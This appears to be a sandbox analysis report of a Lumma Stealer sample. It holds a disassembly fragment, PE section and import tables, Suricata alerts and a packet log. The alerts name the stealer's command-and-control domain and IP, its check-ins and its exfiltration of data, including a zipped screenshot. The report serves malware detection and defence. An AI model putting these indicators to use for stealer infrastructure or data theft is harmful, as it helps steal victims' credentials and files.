jmp 00007FC5B4B06BBDh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FC5B4B06D56h
test esi, ecx
jne 00007FC5B4B06D78h
call 00007FC5B4B06D81h
mov ecx, eax
cmp ecx, edi
jne 00007FC5B4B06D59h
mov ecx, BB40E64Fh
jmp 00007FC5B4B06D60h
test esi, ecx
jne 00007FC5B4B06D5Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E894h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E890h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E920h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8F8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6c4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1b90	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e834	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x247da	0x24800	ba0610d1e4ecb6f5f64959d9eb5b455a	False	0.5549951840753424	data	6.559506263512015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9eb4	0xa000	53eba87ddc7d2455b0ac2836680b1660	False	0.428271484375	DOS executable (COM)	4.9181666163124085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2280	0x1600	112d0c9e43893ae5b7f96d23807996ac	False	0.39506392045454547	data	4.581141173428789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1b90	0x1c00	3080b38ba0e27b64b3ab5ca0f93c1c7c	False	0.7785993303571429	data	6.532705218372571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x4ba00	0x4ba00	250dd5c248e14428968453ebc45126bd	False	1.0003260588842975	data	7.999337203877817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x83000	0x4ba00	0x4ba00	250dd5c248e14428968453ebc45126bd	False	1.0003260588842975	data	7.999337203877817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T17:37:09.693251+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.4	56056	1.1.1.1	53	UDP
2024-12-31T17:37:10.285247+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:10.285247+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:10.758421+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:10.758421+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:11.424848+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:11.424848+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:11.867229+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:11.867229+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:12.697496+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49732	188.114.97.3	443	TCP
2024-12-31T17:37:12.697496+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	188.114.97.3	443	TCP
2024-12-31T17:37:16.450237+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	188.114.97.3	443	TCP
2024-12-31T17:37:16.980147+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49733	188.114.97.3	443	TCP
2024-12-31T17:37:16.980147+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	188.114.97.3	443	TCP
2024-12-31T17:37:18.395431+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49734	188.114.97.3	443	TCP
2024-12-31T17:37:18.395431+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	188.114.97.3	443	TCP
2024-12-31T17:37:22.852054+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49735	188.114.97.3	443	TCP
2024-12-31T17:37:22.852054+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	188.114.97.3	443	TCP
2024-12-31T17:37:26.331153+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49736	188.114.97.3	443	TCP
2024-12-31T17:37:26.331153+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.97.3	443	TCP
2024-12-31T17:37:26.361006+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49736	188.114.97.3	443	TCP
2024-12-31T17:37:29.118021+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49742	188.114.97.3	443	TCP
2024-12-31T17:37:29.118021+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.97.3	443	TCP
2024-12-31T17:37:29.896418+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49742	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:37:09.719739914 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:09.719770908 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:09.719835043 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:09.723352909 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:09.723376036 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.285085917 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.285247087 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.293884039 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.293895006 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.294135094 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.337440968 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.350260973 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.350281954 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.350351095 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.758411884 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.758531094 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.758753061 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.788531065 CET	49730	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.788573027 CET	443	49730	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.961338997 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.961388111 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:10.961469889 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.964643955 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:10.964657068 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.424774885 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.424848080 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.426978111 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.426989079 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.427248955 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.429259062 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.429301977 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.429331064 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867115021 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867156029 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867177963 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867217064 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867213964 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.867279053 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867341042 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.867734909 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867760897 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867794037 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.867810965 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.867866993 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.868141890 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.873902082 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.873927116 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.873955011 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.873970032 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.874030113 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.959969997 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960028887 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960071087 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960098982 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.960138083 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960161924 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960313082 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.960313082 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.960879087 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.960916996 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:11.960942984 CET	49731	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:11.960958004 CET	443	49731	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.230325937 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.230370045 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.230446100 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.230741024 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.230756998 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.697410107 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.697495937 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.698777914 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.698793888 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.699049950 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.700212955 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.700337887 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.700368881 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:12.700437069 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:12.700444937 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.450150967 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.450314045 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.450378895 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:16.450479031 CET	49732	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:16.450499058 CET	443	49732	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.514784098 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:16.514827967 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.514909983 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:16.515153885 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:16.515166998 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.980068922 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:16.980146885 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.005909920 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.005923033 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.006182909 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.025032997 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.025146008 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.025183916 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.748492956 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.748568058 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.748689890 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.749104977 CET	49733	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.749121904 CET	443	49733	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.937923908 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.937969923 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:17.938046932 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.938347101 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:17.938359022 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:18.395370007 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:18.395431042 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:18.396610975 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:18.396625042 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:18.396868944 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:18.397978067 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:18.398125887 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:18.398161888 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:18.398217916 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:18.398230076 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:21.822658062 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:21.822751999 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:21.822835922 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:21.822974920 CET	49734	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:21.822995901 CET	443	49734	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.396245003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.396292925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.396414042 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.396615028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.396629095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.851968050 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.852054119 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.854702950 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.854712009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.854908943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:22.861881971 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.862201929 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:22.862206936 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:25.379285097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:25.379384995 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:25.379426956 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:25.379528999 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:25.379545927 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:25.853744984 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:25.853792906 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:25.853851080 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:25.854326010 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:25.854340076 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.330873966 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.331152916 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.332082987 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.332091093 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.332324982 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.360295057 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.360295057 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.360341072 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.360517979 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.360547066 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.360661030 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.360693932 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.360811949 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.360841990 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.360974073 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361004114 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.361150980 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361175060 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.361182928 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361192942 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.361288071 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361319065 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.361336946 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361535072 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.361562014 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.370270014 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.370434999 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.370451927 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.370470047 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.370497942 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.370754004 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:26.370773077 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:26.370788097 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:28.602416992 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:28.602509022 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:28.602648973 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:28.602736950 CET	49736	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:28.602756977 CET	443	49736	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:28.632592916 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:28.632652044 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:28.632723093 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:28.633018970 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:28.633034945 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.117961884 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.118021011 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.119477034 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.119487047 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.119702101 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.127862930 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.127890110 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.128009081 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896421909 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896491051 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896523952 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896565914 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.896578074 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896589041 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.896617889 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.896986961 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897034883 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.897053003 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897164106 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897202015 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897202015 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.897211075 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897253990 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.897841930 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.897984982 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.898030996 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.898041010 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.898052931 CET	443	49742	188.114.97.3	192.168.2.4
Dec 31, 2024 17:37:29.898091078 CET	49742	443	192.168.2.4	188.114.97.3
Dec 31, 2024 17:37:29.898199081 CET	49742	443	192.168.2.4	188.114.97.3
